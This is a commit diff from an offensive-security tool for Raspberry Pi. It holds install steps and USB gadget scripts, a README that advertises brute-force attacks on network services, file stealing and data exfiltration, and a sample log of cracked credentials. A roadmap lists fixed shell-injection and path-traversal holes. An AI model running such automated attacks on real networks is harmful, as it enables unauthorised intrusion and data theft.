ExecStartPost=/bin/bash -c 'FILE_LIMIT=$(ulimit -n); THRESHOLD=$(( FILE_LIMIT - 1000 )); while :; do TOTAL_OPEN_FILES=$(lsof | wc -l); if [ "$TOTAL_OPEN_FILES" -ge "$THRESHOLD" ]; then echo "File descriptor threshold reached: $TOTAL_OPEN_FILES (threshold: $THRESHOLD). Restarting service."; systemctl restart bjorn.service; exit 0; fi; sleep 10; done &'
[Install]
WantedBy=multi-user.target
```
##### 7.2: Port 8000 Killer Script
Create the script to free up port 8000:
```bash
vi /home/bjorn/Bjorn/kill_port_8000.sh
```
Add:
```bash
#!/bin/bash
PORT=8000
PIDS=$(lsof -t -i:$PORT)
if [ -n "$PIDS" ]; then
echo "Killing PIDs using port $PORT: $PIDS"
kill -9 $PIDS
fi
```
Make the script executable:
```bash
chmod +x /home/bjorn/Bjorn/kill_port_8000.sh
```
##### 7.3: USB Gadget Configuration
Modify `/boot/firmware/cmdline.txt`:
```bash
sudo vi /boot/firmware/cmdline.txt
```
Add the following right after `rootwait`:
```
modules-load=dwc2,g_ether
```
Modify `/boot/firmware/config.txt`:
```bash
sudo vi /boot/firmware/config.txt
```
Add at the end of the file:
```
dtoverlay=dwc2
```
Create the USB gadget script:
```bash
sudo vi /usr/local/bin/usb-gadget.sh
```
Add the following content:
```bash
#!/bin/bash
set -e
modprobe libcomposite
cd /sys/kernel/config/usb_gadget/
mkdir -p g1
cd g1
echo 0x1d6b > idVendor
echo 0x0104 > idProduct
echo 0x0100 > bcdDevice
echo 0x0200 > bcdUSB
mkdir -p strings/0x409
echo "fedcba9876543210" > strings/0x409/serialnumber
echo "Raspberry Pi" > strings/0x409/manufacturer
echo "Pi Zero USB" > strings/0x409/product
mkdir -p configs/c.1/strings/0x409
echo "Config 1: ECM network" > configs/c.1/strings/0x409/configuration
echo 250 > configs/c.1/MaxPower
mkdir -p functions/ecm.usb0
# Check for existing symlink and remove if necessary
if [ -L configs/c.1/ecm.usb0 ]; then
rm configs/c.1/ecm.usb0
fi
ln -s functions/ecm.usb0 configs/c.1/
# Ensure the device is not busy before listing available USB device controllers
max_retries=10
retry_count=0
while ! ls /sys/class/udc > UDC 2>/dev/null; do
if [ $retry_count -ge $max_retries ]; then
echo "Error: Device or resource busy after $max_retries attempts."
exit 1
fi
retry_count=$((retry_count + 1))
sleep 1
done
# Check if the usb0 interface is already configured
if ! ip addr show usb0 | grep -q "172.20.2.1"; then
ifconfig usb0 172.20.2.1 netmask 255.255.255.0
else
echo "Interface usb0 already configured."
fi
```
Make the script executable:
```bash
sudo chmod +x /usr/local/bin/usb-gadget.sh
```
Create the systemd service:
```bash
sudo vi /etc/systemd/system/usb-gadget.service
```
Add:
```ini
[Unit]
Description=USB Gadget Service
After=network.target
[Service]
ExecStartPre=/sbin/modprobe libcomposite
ExecStart=/usr/local/bin/usb-gadget.sh
Type=simple
RemainAfterExit=yes
[Install]
WantedBy=multi-user.target
```
Configure `usb0`:
```bash
sudo vi /etc/network/interfaces
```
Add:
```bash
allow-hotplug usb0
iface usb0 inet static
address 172.20.2.1
netmask 255.255.255.0
```
Reload the services:
```bash
sudo systemctl daemon-reload
sudo systemctl enable systemd-networkd
sudo systemctl enable usb-gadget
sudo systemctl start systemd-networkd
sudo systemctl start usb-gadget
```
You must reboot to be able to use it as a USB gadget (with ip)
###### Windows PC Configuration
Set the static IP address on your Windows PC:
- **IP Address**: `172.20.2.2`
- **Subnet Mask**: `255.255.255.0`
- **Default Gateway**: `172.20.2.1`
- **DNS Servers**: `8.8.8.8`, `8.8.4.4`
---
## 📜 License
2024 - Bjorn is distributed under the MIT License. For more details, please refer to the [LICENSE](LICENSE) file included in this repository.

21
LICENSE
View File

@@ -1,21 +0,0 @@
MIT License
Copyright (c) 2024 infinition
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

177
README.md
View File

@@ -1,177 +0,0 @@
# <img src="https://github.com/user-attachments/assets/c5eb4cc1-0c3d-497d-9422-1614651a84ab" alt="thumbnail_IMG_0546" width="33"> Bjorn
![Python](https://img.shields.io/badge/Python-3776AB?logo=python&logoColor=fff)
![Status](https://img.shields.io/badge/Status-Development-blue.svg)
[![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](https://opensource.org/licenses/MIT)
[![Reddit](https://img.shields.io/badge/Reddit-Bjorn__CyberViking-orange?style=for-the-badge&logo=reddit)](https://www.reddit.com/r/Bjorn_CyberViking)
[![Discord](https://img.shields.io/badge/Discord-Join%20Us-7289DA?style=for-the-badge&logo=discord)](https://discord.com/invite/B3ZH9taVfT)
<p align="center">
<img src="https://github.com/user-attachments/assets/c5eb4cc1-0c3d-497d-9422-1614651a84ab" alt="thumbnail_IMG_0546" width="150">
<img src="https://github.com/user-attachments/assets/1b490f07-f28e-4418-8d41-14f1492890c6" alt="bjorn_epd-removebg-preview" width="150">
</p>
Bjorn is a « Tamagotchi like » sophisticated, autonomous network scanning, vulnerability assessment, and offensive security tool designed to run on a Raspberry Pi equipped with a 2.13-inch e-Paper HAT. This document provides a detailed explanation of the project.
## 📚 Table of Contents
- [Introduction](#-introduction)
- [Features](#-features)
- [Getting Started](#-getting-started)
- [Prerequisites](#-prerequisites)
- [Installation](#-installation)
- [Quick Start](#-quick-start)
- [Usage Example](#-usage-example)
- [Contributing](#-contributing)
- [License](#-license)
- [Contact](#-contact)
## 📄 Introduction
Bjorn is a powerful tool designed to perform comprehensive network scanning, vulnerability assessment, and data ex-filtration. Its modular design and extensive configuration options allow for flexible and targeted operations. By combining different actions and orchestrating them intelligently, Bjorn can provide valuable insights into network security and help identify and mitigate potential risks.
The e-Paper HAT display and web interface make it easy to monitor and interact with Bjorn, providing real-time updates and status information. With its extensible architecture and customizable actions, Bjorn can be adapted to suit a wide range of security testing and monitoring needs.
## 🌟 Features
- **Network Scanning**: Identifies live hosts and open ports on the network.
- **Vulnerability Assessment**: Performs vulnerability scans using Nmap and other tools.
- **System Attacks**: Conducts brute-force attacks on various services (FTP, SSH, SMB, RDP, Telnet, SQL).
- **File Stealing**: Extracts data from vulnerable services.
- **User Interface**: Real-time display on the e-Paper HAT and web interface for monitoring and interaction.
![Bjorn Display](https://github.com/infinition/Bjorn/assets/37984399/bcad830d-77d6-4f3e-833d-473eadd33921)
## 🚀 Getting Started
## 📌 Prerequisites
### 📋 Prerequisites for RPI zero W (32bits)
![image](https://github.com/user-attachments/assets/3980ec5f-a8fc-4848-ab25-4356e0529639)
- Raspberry Pi OS installed.
- Stable:
- System: 32-bit
- Kernel version: 6.6
- Debian version: 12 (bookworm) '2024-10-22-raspios-bookworm-armhf-lite'
- Username and hostname set to `bjorn`.
- 2.13-inch e-Paper HAT connected to GPIO pins.
### 📋 Prerequisites for RPI zero W2 (64bits)
![image](https://github.com/user-attachments/assets/e8d276be-4cb2-474d-a74d-b5b6704d22f5)
I did not develop Bjorn for the raspberry pi zero w2 64bits, but several feedbacks have attested that the installation worked perfectly.
- Raspberry Pi OS installed.
- Stable:
- System: 64-bit
- Kernel version: 6.6
- Debian version: 12 (bookworm) '2024-10-22-raspios-bookworm-arm64-lite'
- Username and hostname set to `bjorn`.
- 2.13-inch e-Paper HAT connected to GPIO pins.
At the moment the paper screen v2 v4 have been tested and implemented.
I juste hope the V1 & V3 will work the same.
### 🔨 Installation
The fastest way to install Bjorn is using the automatic installation script :
```bash
# Download and run the installer
wget https://raw.githubusercontent.com/infinition/Bjorn/refs/heads/main/install_bjorn.sh
sudo chmod +x install_bjorn.sh && sudo ./install_bjorn.sh
# Choose the choice 1 for automatic installation. It may take a while as a lot of packages and modules will be installed. You must reboot at the end.
```
For **detailed information** about **installation** process go to [Install Guide](INSTALL.md)
## ⚡ Quick Start
**Need help ? You struggle to find Bjorn's IP after the installation ?**
Use my Bjorn Detector & SSH Launcher :
[https://github.com/infinition/bjorn-detector](https://github.com/infinition/bjorn-detector)
![ezgif-1-a310f5fe8f](https://github.com/user-attachments/assets/182f82f0-5c3a-48a9-a75e-37b9cfa2263a)
**Hmm, You still need help ?**
For **detailed information** about **troubleshooting** go to [Troubleshooting](TROUBLESHOOTING.md)
**Quick Installation**: you can use the fastest way to install **Bjorn** [Getting Started](#-getting-started)
## 💡 Usage Example
Here's a demonstration of how Bjorn autonomously hunts through your network like a Viking raider (fake demo for illustration):
```bash
# Reconnaissance Phase
[NetworkScanner] Discovering alive hosts...
[+] Host found: 192.168.1.100
├── Ports: 22,80,445,3306
└── MAC: 00:11:22:33:44:55
# Attack Sequence
[NmapVulnScanner] Found vulnerabilities on 192.168.1.100
├── MySQL 5.5 < 5.7 - User Enumeration
└── SMB - EternalBlue Candidate
[SSHBruteforce] Cracking credentials...
[+] Success! user:password123
[StealFilesSSH] Extracting sensitive data...
# Automated Data Exfiltration
[SQLBruteforce] Database accessed!
[StealDataSQL] Dumping tables...
[SMBBruteforce] Share accessible
[+] Found config files, credentials, backups...
```
This is just a demo output - actual results will vary based on your network and target configuration.
All discovered data is automatically organized in the data/output/ directory, viewable through both the e-Paper display (as indicators) and web interface.
Bjorn works tirelessly, expanding its network knowledge base and growing stronger with each discovery.
No constant monitoring needed - just deploy and let Bjorn do what it does best: hunt for vulnerabilities.
🔧 Expand Bjorn's Arsenal!
Bjorn is designed to be a community-driven weapon forge. Create and share your own attack modules!
⚠️ **For educational and authorized testing purposes only** ⚠️
## 🤝 Contributing
The project welcomes contributions in:
- New attack modules.
- Bug fixes.
- Documentation.
- Feature improvements.
For **detailed information** about **contributing** process go to [Contributing Docs](CONTRIBUTING.md), [Code Of Conduct](CODE_OF_CONDUCT.md) and [Development Guide](DEVELOPMENT.md).
## 📫 Contact
- **Report Issues**: Via GitHub.
- **Guidelines**:
- Follow ethical guidelines.
- Document reproduction steps.
- Provide logs and context.
- **Author**: __infinition__
- **GitHub**: [infinition/Bjorn](https://github.com/infinition/Bjorn)
## 🌠 Stargazers
[![Star History Chart](https://api.star-history.com/svg?repos=infinition/bjorn&type=Date)](https://star-history.com/#infinition/bjorn&Date)
---
## 📜 License
2024 - Bjorn is distributed under the MIT License. For more details, please refer to the [LICENSE](LICENSE) file included in this repository.

315
ROADMAP.md Normal file
View File

@@ -0,0 +1,315 @@
# BJORN Cyberviking — Roadmap & Changelog
> Comprehensive audit-driven roadmap for the v2 release.
> Each section tracks scope, status, and implementation notes.
---
## Legend
| Tag | Meaning |
|-----|---------|
| `[DONE]` | Implemented and verified |
| `[WIP]` | Work in progress |
| `[TODO]` | Not yet started |
| `[DROPPED]` | Descoped / won't fix |
---
## P0 — Security & Blockers (Must-fix before release)
### SEC-01: Shell injection in system_utils.py `[DONE]`
- **File:** `web_utils/system_utils.py`
- **Issue:** `subprocess.Popen(command, shell=True)` on reboot, shutdown, restart, clear_logs
- **Fix:** Replace all `shell=True` calls with argument lists (`["sudo", "reboot"]`)
- **Risk:** Command injection if any parameter is ever user-controlled
### SEC-02: Path traversal in DELETE route `[DONE]`
- **File:** `webapp.py:497-498`
- **Issue:** MAC address extracted from URL path with no validation — `self.path.split(...)[-1]`
- **Fix:** URL-decode and validate MAC format with regex before passing to handler
### SEC-03: Path traversal in file operations `[DONE]`
- **File:** `web_utils/file_utils.py`
- **Issue:** `move_file`, `rename_file`, `delete_file` accept paths from POST body.
Path validation uses `startswith()` which can be bypassed (symlinks, encoding).
- **Fix:** Use `os.path.realpath()` instead of `os.path.abspath()` for canonicalization.
Add explicit path validation helper used by all file ops.
### SEC-04: Cortex secrets committed to repo `[DONE]`
- **Files:** `bjorn-cortex/Cortex/security_config.json`, `server_config.json`
- **Issue:** JWT secret, TOTP secret, admin password hash, device API key in git
- **Fix:** Replaced with clearly-marked placeholder values + WARNING field, already in `.gitignore`
### SEC-05: Cortex WebSocket without auth `[DONE]`
- **File:** `bjorn-cortex/Cortex/server.py`
- **Issue:** `/ws/logs` endpoint has no authentication — anyone can see training logs
- **Fix:** Added `_verify_ws_token()` — JWT via query param or first message, close 4401 on failure
### SEC-06: Cortex device API auth disabled by default `[DONE]`
- **File:** `bjorn-cortex/Cortex/server_config.json`
- **Issue:** `allow_device_api_without_auth: true` + empty `device_api_key`
- **Fix:** Default to `false`, placeholder API key, CORS origins via `CORS_ORIGINS` env var
---
## P0 — Bluetooth Fixes
### BT-01: Bare except clauses `[DONE]`
- **File:** `web_utils/bluetooth_utils.py:225,258`
- **Issue:** `except:` swallows all exceptions including SystemExit, KeyboardInterrupt
- **Fix:** Replace with `except (dbus.exceptions.DBusException, Exception) as e:` with logging
### BT-02: Null address passed to BT functions `[DONE]`
- **File:** `webapp.py:210-214`
- **Issue:** `d.get('address')` can return None, passed directly to BT methods
- **Fix:** Add null check + early return with error in each lambda/BT method entry point
### BT-03: Race condition on bt.json `[DONE]`
- **File:** `web_utils/bluetooth_utils.py:200-216`
- **Issue:** Read-modify-write on shared file without locking
- **Fix:** Add `threading.Lock` for bt.json access, use atomic write pattern
### BT-04: auto_bt_connect service crash `[DONE]`
- **File:** `web_utils/bluetooth_utils.py:219`
- **Issue:** `subprocess.run(..., check=True)` raises CalledProcessError if service missing
- **Fix:** Use `check=False` and log warning instead of crashing
---
## P0 — Web Server Fixes
### WEB-01: SSE reconnect counter reset bug `[DONE]`
- **File:** `web/js/core/console-sse.js:367`
- **Issue:** `reconnectCount = 0` on every message — a single flaky message resets counter,
enabling infinite reconnect loops
- **Fix:** Only reset counter after sustained healthy connection (e.g., 5+ messages)
### WEB-02: Silent routes list has trailing empty string `[DONE]`
- **File:** `webapp.py:474`
- **Issue:** Empty string `""` in `silent_routes` matches ALL log messages
- **Fix:** Remove empty string from list
---
## P1 — Stability & Consistency
### STAB-01: Uniform error handling pattern `[DONE]`
- **Files:** All `web_utils/*.py`
- **Issue:** Mix of bare `except:`, `except Exception`, inconsistent error response format
- **Fix:** Establish `_json_response(handler, data, status)` helper; catch specific exceptions
### STAB-02: Add pagination to heavy API endpoints `[DONE]`
- **Files:** `web_utils/netkb_utils.py`, `web_utils/orchestrator_utils.py`
- **Endpoints:** `/netkb_data`, `/list_credentials`, `/network_data`
- **Fix:** Accept `?page=N&per_page=M` query params, return `{data, total, page, pages}`
### STAB-03: Dead routes & unmounted pages `[DONE]`
- **Files:** `web/js/app.js`, various
- **Issue:** GPS UI elements with no backend, rl-dashboard not mounted, zombieland incomplete
- **Fix:** Remove GPS placeholder, wire rl-dashboard mount, mark zombieland as beta
### STAB-04: Missing constants for magic numbers `[DONE]`
- **Files:** `web_utils/bluetooth_utils.py`, `webapp.py`
- **Fix:** Extract timeout values, pool sizes, size limits to named constants
---
## P2 — Web SPA Quality
### SPA-01: Review & fix dashboard.js `[DONE]`
- Check stat polling, null safety, error display
### SPA-02: Review & fix network.js `[DONE]`
- D3 graph cleanup on unmount, memory leak check
### SPA-03: Review & fix credentials.js `[DONE]`
- Search/filter robustness, export edge cases
### SPA-04: Review & fix vulnerabilities.js `[DONE]`
- CVE modal error handling, feed sync status
### SPA-05: Review & fix files.js `[DONE]`
- Upload progress, drag-drop edge cases, path validation
### SPA-06: Review & fix netkb.js `[DONE]`
- View mode transitions, filter persistence, pagination integration
### SPA-07: Review & fix web-enum.js `[DONE]`
- Status code filter, date range, export completeness
### SPA-08: Review & fix rl-dashboard.js `[DONE]`
- Canvas cleanup, mount lifecycle, null data handling
### SPA-09: Review & fix zombieland.js (C2) `[DONE]`
- SSE lifecycle, agent list refresh, mark as experimental
### SPA-10: Review & fix scripts.js `[DONE]`
- Output polling cleanup, project upload validation
### SPA-11: Review & fix attacks.js `[DONE]`
- Tab switching, image upload validation
### SPA-12: Review & fix bjorn.js (EPD viewer) `[DONE]`
- Image refresh, zoom controls, null EPD state
### SPA-13: Review & fix settings-config.js `[DONE]`
- Form generation edge cases, chip editor validation
### SPA-14: Review & fix actions-studio.js `[DONE]`
- Canvas lifecycle, node dragging, edge persistence
---
## P2 — AI/Cortex Improvements
### AI-01: Feature selection / importance analysis `[DONE]`
- Variance-based feature filtering in data consolidator (drops near-zero variance features)
- Feature manifest exported alongside training data
- `get_feature_importance()` method on FeatureLogger for introspection
- Config: `ai_feature_selection_min_variance` (default 0.001)
### AI-02: Continuous reward shaping `[DONE]`
- Extended reward function with 4 new components: novelty bonus, repeat penalty,
diminishing returns, partial credit for long-running failed actions
- Helper methods to query attempt counts and consecutive failures from ml_features
### AI-03: Model versioning & rollback `[DONE]`
- Keep up to 3 model versions on disk (configurable)
- Model history tracking: version, loaded_at, accuracy, avg_reward
- `rollback_model()` method to load previous version
- Auto-rollback if average reward drops below previous model after 50 decisions
### AI-04: Low-data cold-start bootstrap `[DONE]`
- Bootstrap scores dict accumulating per (action_name, port_profile) running averages
- Blended heuristic/bootstrap scoring (40-80% weight based on sample count)
- Persistent `ai_bootstrap_scores.json` across restarts
- Config: `ai_cold_start_bootstrap_weight` (default 0.6)
---
## P3 — Future Features
### EPD-01: Multi-size EPD layout engine `[DONE]`
- New `display_layout.py` module with `DisplayLayout` class
- JSON layout definitions per EPD type (2.13", 2.7")
- Element-based positioning: each UI component has named anchor `{x, y, w, h}`
- Custom layouts stored in `resources/layouts/{epd_type}.json`
- `px()`/`py()` scaling preserved, layout provides reference coordinates
- Integrated into `display.py` rendering pipeline
### EPD-02: Web-based EPD layout editor `[DONE]`
- Backend API: `GET/POST /api/epd/layout`, `POST /api/epd/layout/reset`
- `GET /api/epd/layouts` lists all supported EPD types and their layouts
- `GET /api/epd/layout?epd_type=X` to fetch layout for a specific EPD type
- Frontend editor: `web/js/core/epd-editor.js` — 4th tab in attacks page
- SVG canvas with drag-and-drop element positioning and corner resize handles
- Display mode preview: Color, NB (black-on-white), BN (white-on-black)
- Grid/snap, zoom (50-600%), toggleable element labels
- Add/delete elements, import/export layout JSON
- Properties panel with x/y/w/h editors, font size editors
- Undo system (50-deep snapshot stack, Ctrl+Z)
- Color-coded elements by type (icons=blue, text=green, bars=orange, etc.)
- Transparency-aware checkerboard canvas background
- Arrow key nudge, keyboard shortcuts
### ORCH-01: Per-action circuit breaker `[DONE]`
- New `action_circuit_breaker` DB table: failure_streak, circuit_status, cooldown_until
- Three states: closed → open (after N fails) → half_open (after cooldown)
- Exponential backoff: `min(2^streak * 60, 3600)` seconds
- Integrated into `_should_queue_action()` check
- Success on half-open resets circuit, failure re-opens with longer cooldown
- Config: `circuit_breaker_threshold` (default 3)
### ORCH-02: Global concurrency limiter `[DONE]`
- DB-backed running action count check before scheduling
- `count_running_actions()` method in queue.py
- Per-action `max_concurrent` support in requirements evaluator
- Respects `semaphore_slots` config (default 5)
### ORCH-03: Manual mode with active scanning `[DONE]`
- Background scan timer thread in MANUAL mode
- NetworkScanner runs at `manual_mode_scan_interval` (default 180s)
- Config: `manual_mode_auto_scan` (default True)
- Scan timer auto-stops when switching back to AUTO/AI
---
## Changelog
### 2026-03-12 — Security & Stability Audit
#### Security
- **[SEC-01]** Replaced all `shell=True` subprocess calls with safe argument lists
- **[SEC-02]** Added MAC address validation (regex) in DELETE route handler
- **[SEC-03]** Strengthened path validation using `os.path.realpath()` + dedicated helper
- **[BT-01]** Replaced bare `except:` with specific exception handling + logging
- **[BT-02]** Added null address validation in Bluetooth route lambdas and method entry points
- **[BT-03]** Added file lock for bt.json read/write operations
- **[BT-04]** Changed auto_bt_connect restart to non-fatal (check=False)
- **[SEC-04]** Cortex config files: placeholder secrets + WARNING field, already gitignored
- **[SEC-05]** Added JWT auth to Cortex WebSocket `/ws/logs` endpoint
- **[SEC-06]** Cortex device API auth now required by default, CORS configurable via env var
#### Bug Fixes
- **[WEB-01]** Fixed SSE reconnect counter: only resets after 5+ consecutive healthy messages
- **[WEB-02]** Removed empty string from silent_routes that was suppressing all log messages
- **[STAB-03]** Cleaned up dead GPS UI references, wired rl-dashboard mount
- **[ORCH-BUG]** Fixed Auto→Manual mode switch not resetting status to IDLE (4-location fix):
- `orchestrator.py`: Reset all status fields after main loop exit AND after action completes with exit flag
- `Bjorn.py`: Reset status even when `thread.join(10)` times out
- `orchestrator_utils.py`: Explicit IDLE reset in web API stop handler
#### Quality
- **[STAB-01]** Standardized error handling across web_utils modules
- **[STAB-04]** Extracted magic numbers to named constants
#### SPA Page Review (SPA-01..14)
All 18 SPA page modules reviewed and fixed:
**Pages fully rewritten (11 pages):**
- **dashboard.js** — New layout with ResourceTracker, safe DOM (no innerHTML), visibility-aware pollers, proper uptime ticker cleanup
- **network.js** — D3 force graph cleanup on unmount, lazy d3 loading, search debounce tracked, simulation stop
- **credentials.js** — AbortController tracked, toast timer tracked, proper state reset in unmount
- **vulnerabilities.js** — ResourceTracker integration, abort controllers, null safety throughout
- **files.js** — Upload progress, drag-drop safety, ResourceTracker lifecycle
- **netkb.js** — View mode persistence, filter tracked, pagination integration
- **web-enum.js** — Status filter, date range, tracked pollers and timeouts
- **rl-dashboard.js** — Canvas cleanup, chart lifecycle, null data guards
- **zombieland.js** — SSE lifecycle tracked, agent list cleanup, experimental flag
- **attacks.js** — Tab switching, ResourceTracker integration, proper cleanup
- **bjorn.js** — Image refresh tracked, zoom controls, null EPD state handling
**Pages with targeted fixes (7 pages):**
- **bjorn-debug.js** — Fixed 3 button event listeners using raw `addEventListener``tracker.trackEventListener` (memory leak)
- **scheduler.js** — Added `searchDeb` timeout cleanup + state reset in unmount (zombie timer)
- **actions.js** — Added resize debounce cleanup in unmount + tracked `highlightPane` timeout (zombie timer)
- **backup.js** — Already clean: ResourceTracker, sidebar layout cleanup, state reset (no changes needed)
- **database.js** — Already clean: search debounce cleanup, sidebar layout, Poller lifecycle (no changes needed)
- **loot.js** — Already clean: search timer cleanup, ResourceTracker, state reset (no changes needed)
- **actions-studio.js** — Already clean: runtime cleanup function, ResourceTracker (no changes needed)
#### AI Pipeline (AI-01..04)
- **[AI-01]** Feature selection: variance-based filtering in `data_consolidator.py`, feature manifest export, `get_feature_importance()` in `feature_logger.py`
- **[AI-02]** Continuous reward shaping in `orchestrator.py`: novelty bonus, diminishing returns penalty, partial credit for long-running failures, attempt/streak DB queries
- **[AI-03]** Model versioning in `ai_engine.py`: 3-model history, `rollback_model()`, auto-rollback after 50 decisions if avg reward drops
- **[AI-04]** Cold-start bootstrap in `ai_engine.py`: persistent `ai_bootstrap_scores.json`, blended heuristic/bootstrap scoring with adaptive weighting
#### Orchestrator (ORCH-01..03)
- **[ORCH-01]** Circuit breaker: new `action_circuit_breaker` DB table in `db_utils/queue.py`, 3-state machine (closed→open→half-open), exponential backoff `min(2^N*60, 3600)s`, integrated into `action_scheduler.py` scheduling decisions and `orchestrator.py` post-execution
- **[ORCH-02]** Global concurrency limiter: `count_running_actions()` in `db_utils/queue.py`, pre-schedule check in `action_scheduler.py` against `semaphore_slots` config
- **[ORCH-03]** Manual mode scanning: background `_scan_loop` thread in `orchestrator_utils.py`, runs at `manual_mode_scan_interval` (180s default), auto-stops on mode switch
#### EPD Multi-Size (EPD-01..02)
- **[EPD-01]** New `display_layout.py` module: `DisplayLayout` class with JSON-based element positioning, built-in layouts for 2.13" and 2.7" displays, custom layout override via `resources/layouts/`, 20+ elements integrated into `display.py` rendering pipeline
- **[EPD-02]** Backend API: `GET/POST /api/epd/layout`, `POST /api/epd/layout/reset`, `GET /api/epd/layouts` — endpoints in `web_utils/system_utils.py`, routes in `webapp.py`
- **[EPD-02]** Frontend editor: `web/js/core/epd-editor.js` as 4th tab in attacks page — SVG drag-and-drop canvas, resize handles, Color/NB/BN display modes, grid/snap/zoom, add/delete elements, import/export JSON, undo stack, font size editing, arrow key nudge
#### New Configuration Parameters
- `ai_feature_selection_min_variance` (0.001) — minimum variance for feature inclusion
- `ai_model_history_max` (3) — max model versions kept on disk
- `ai_auto_rollback_window` (50) — decisions before auto-rollback evaluation
- `ai_cold_start_bootstrap_weight` (0.6) — bootstrap vs static heuristic weight
- `circuit_breaker_threshold` (3) — consecutive failures to open circuit
- `manual_mode_auto_scan` (true) — auto-scan in MANUAL mode
- `manual_mode_scan_interval` (180) — seconds between manual mode scans

View File

@@ -1,48 +0,0 @@
# 🔒 Security Policy
Security Policy for **Bjorn** repository includes all required compliance matrix and artifact mapping.
## 🧮 Supported Versions
We provide security updates for the following versions of our project:
| Version | Status | Secure |
| ------- |-------------| ------ |
| 1.0.0 | Development | No |
## 🛡️ Security Practices
- We follow best practices for secure coding and infrastructure management.
- Regular security audits and code reviews are conducted to identify and mitigate potential risks.
- Dependencies are monitored and updated to address known vulnerabilities.
## 📲 Security Updates
- Security updates are released as soon as possible after a vulnerability is confirmed.
- Users are encouraged to update to the latest version to benefit from security fixes.
## 🚨 Reporting a Vulnerability
If you discover a security vulnerability within this project, please follow these steps:
1. **Do not create a public issue.** Instead, contact us directly to responsibly disclose the vulnerability.
2. **Email** [bjorn-cyberviking@outlook.com](mailto:bjorn-cyberviking@outlook.com) with the following information:
- A description of the vulnerability.
- Steps to reproduce the issue.
- Any potential impact or severity.
3. **Wait for a response.** We will acknowledge your report and work with you to address the issue promptly.
## 🛰️ Additional Resources
- [OWASP Security Guidelines](https://owasp.org/)
Thank you for helping us keep this project secure!
---
## 📜 License
2024 - Bjorn is distributed under the MIT License. For more details, please refer to the [LICENSE](LICENSE) file included in this repository.

View File

@@ -1,80 +0,0 @@
# 🐛 Known Issues and Troubleshooting
<p align="center">
<img src="https://github.com/user-attachments/assets/c5eb4cc1-0c3d-497d-9422-1614651a84ab" alt="thumbnail_IMG_0546" width="98">
</p>
## 📚 Table of Contents
- [Current Development Issues](#-current-development-issues)
- [Troubleshooting Steps](#-troubleshooting-steps)
- [License](#-license)
## 🪲 Current Development Issues
### Long Runtime Issue
- **Problem**: `OSError: [Errno 24] Too many open files`
- **Status**: Partially resolved with system limits configuration.
- **Workaround**: Implemented file descriptor limits increase.
- **Monitoring**: Check open files with `lsof -p $(pgrep -f Bjorn.py) | wc -l`
- At the moment the logs show periodically this information as (FD : XXX)
## 🛠️ Troubleshooting Steps
### Service Issues
```bash
#See bjorn journalctl service
journalctl -fu bjorn.service
# Check service status
sudo systemctl status bjorn.service
# View detailed logs
sudo journalctl -u bjorn.service -f
or
sudo tail -f /home/bjorn/Bjorn/data/logs/*
# Check port 8000 usage
sudo lsof -i :8000
```
### Display Issues
```bash
# Verify SPI devices
ls /dev/spi*
# Check user permissions
sudo usermod -a -G spi,gpio bjorn
```
### Network Issues
```bash
# Check network interfaces
ip addr show
# Test USB gadget interface
ip link show usb0
```
### Permission Issues
```bash
# Fix ownership
sudo chown -R bjorn:bjorn /home/bjorn/Bjorn
# Fix permissions
sudo chmod -R 755 /home/bjorn/Bjorn
```
---
## 📜 License
2024 - Bjorn is distributed under the MIT License. For more details, please refer to the [LICENSE](LICENSE) file included in this repository.

1677
action_scheduler.py Normal file

File diff suppressed because it is too large Load Diff

View File

@@ -1,15 +1,9 @@
#Test script to add more actions to BJORN
from rich.console import Console
from shared import SharedData
b_class = "IDLE"
b_module = "idle_action"
b_status = "idle_action"
b_port = None
b_parent = None
b_module = "idle"
b_status = "IDLE"
console = Console()
class IDLE:
def __init__(self, shared_data):

Binary file not shown.

After

Width:  |  Height:  |  Size: 23 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 19 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 20 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 16 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 22 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 22 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 19 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 17 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 19 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 20 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 7.1 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 6.6 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 21 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 19 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 23 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 19 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 19 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 17 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 17 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 15 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 23 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 24 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 21 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 14 KiB

330
actions/arp_spoofer.py Normal file
